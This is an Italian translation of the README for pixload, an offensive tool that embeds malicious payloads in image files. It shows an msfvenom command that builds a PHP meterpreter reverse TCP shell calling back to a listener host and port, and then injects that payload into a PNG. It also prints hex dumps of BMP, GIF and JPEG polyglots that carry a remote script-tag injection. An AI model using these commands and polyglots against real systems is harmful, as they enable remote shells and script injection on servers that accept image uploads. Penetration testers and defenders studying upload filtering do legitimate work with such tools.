
Strumenti per la creazione/iniezione di payload nelle immagini
Insieme di strumenti per nascondere backdoor creare/iniettare payload nelle immagini.
I seguenti tipi di immagine sono attualmente supportati: BMP, GIF, JPG, PNG, WebP.
Riferimenti utili per comprendere meglio pixload e i suoi casi d'uso:
Se vuoi codificare un payload in modo tale che il blob binario risultante sia sia un valido shellcode x86 che un file immagine valido, ti consiglio di guardare qui e qui.
Se vuoi iniettare un payload metasploit, devi fare qualcosa del genere:
$ msfvenom -p php/meterpreter_reverse_tcp \
LHOST=192.168.0.1 LPORT=31337 -f raw 2>/dev/null > payload.php
Modifica payload.php se necessario.
Inietta payload.php nell'immagine (ad es. png).
$ pixload-png --payload "$(cat payload.php)" payload.png
I seguenti moduli Perl sono richiesti:
GD
Image::ExifTool
String::CRC32
Su sistemi Debian-based installa questi pacchetti:
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
Su FreeBSD e DragonFlyBSD installa questi pacchetti:
doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32
Su OSX fai riferimento a questa soluzione alternativa
(grazie a @iosdec).
make install
docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload
$ pixload-bmp --help
Usage: pixload-bmp [OPTION]... FILE
Nascondi Payload/Codice Maligno in immagini BMP.
Gli argomenti obbligatori per le opzioni lunghe sono obbligatori anche per quelle brevi.
-P, --payload STRING imposta il payload per l'iniezione
-v, --version stampa la versione ed esci
-h, --help stampa l'aiuto ed esci
Se il FILE di output esiste già, il payload verrà iniettato in questo file esistente. Altrimenti, verrà creato un nuovo file.
$ pixload-bmp payload.bmp
...... Creatore/Iniettore di Payload BMP ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generazione del file di output
[✔] File salvato in: payload.bmp
[>] Iniezione del payload in payload.bmp
[✔] Payload iniettato con successo
payload.bmp: PC bitmap, formato OS/2 1.x, 1 x 1 x 24, cbSize 10799, bit offset 26
00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;<script src=/|
00000030 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e 3c 2f 73 |/example.com></s|
00000040 63 72 69 70 74 3e 3b |cript>;|
00000047
Vedi la pagina di manuale pixload-bmp(1) per ulteriori informazioni.
$ pixload-gif --help
Usage: pixload-gif [OPTION]... FILE
Nascondi payload/codice maligno in immagini GIF.
Gli argomenti obbligatori per le opzioni lunghe sono obbligatori anche per quelle brevi.
-W, --pixelwidth INTEGER (nessun effetto)
imposta la larghezza in pixel per la nuova immagine (predefinito: 10799)
-H, --pixelheight INTEGER imposta l'altezza in pixel per la nuova immagine (predefinito: 32)
-P, --payload STRING imposta il payload per l'iniezione
-v, --version stampa la versione ed esci
-h, --help stampa l'aiuto ed esci
L'opzione -W, --pixelwidth non ha effetto poiché pixload-gif riscrive i byte di larghezza pixel con i caratteri "/*", per preparare l'immagine gif poliglotta.
Se il FILE di output esiste già, il payload verrà iniettato in questo file esistente. Altrimenti, verrà creato un nuovo file con la larghezza in pixel specificata.
$ pixload-gif payload.gif
...... Creatore/Iniettore di Payload GIF ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generazione del file di output
[✔] File salvato in: payload.gif
[>] Iniezione del payload in payload.gif
[✔] Payload iniettato con successo
payload.gif: dati immagine GIF, versione 87a, 10799 x 32
00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* .......|
00000010 00 00 00 2c 00 00 00 00 20 00 20 00 00 02 1e 84 |...,.... . .....|
00000020 8f a9 cb ed 0f a3 9c b4 da 8b b3 de bc fb 0f 86 |................|
00000030 e2 48 96 e6 89 a6 ea ca b6 ee 0b 9b 05 00 3b 2a |.H............;*|
00000040 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d |/=1;<script src=|
00000050 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e 3c 2f |//example.com></|
00000060 73 63 72 69 70 74 3e 3b |script>;|
00000068
Vedi la pagina di manuale pixload-gif(1) per ulteriori informazioni.
$ pixload-jpg --help
Usage: pixload-jpg [OPTION]... FILE
Nascondi Payload/Codice Maligno in immagini JPEG.
Gli argomenti obbligatori per le opzioni lunghe sono obbligatori anche per quelle brevi.
-S, --section COM|DQT imposta la sezione per l'iniezione del payload
-P, --payload STRING imposta il payload per l'iniezione
-v, --version stampa la versione ed esci
-h, --help stampa l'aiuto ed esci
Se il FILE di output esiste già, il payload verrà iniettato in questo file esistente. Altrimenti, verrà creato un nuovo file.
$ pixload-jpg -S com payload.jpg
..... Creatore/Iniettore di Payload JPEG ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generazione del file di output
[✔] File salvato in: payload.jpg
[>] Iniezione del payload in COMMENTO
[✔] Payload iniettato con successo
payload.jpg: dati immagine JPEG, progressivo, precisione 8, 1x1, componenti 1
00000000 ff d8 ff fe 00 25 3c 73 63 72 69 70 74 20 73 72 |.....%<script sr|
00000010 63 3d 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d 3e |c=//example.com>|
00000020 3c 2f 73 63 72 69 70 74 3e ff db 00 43 00 01 01 |</script>...C...|
00000030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
*
00000060 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 |................|
00000070 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 14 00 |................|
00000080 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 03 ff da 00 08 01 01 00 00 00 01 3f ff d9 |...........?..|
0000009e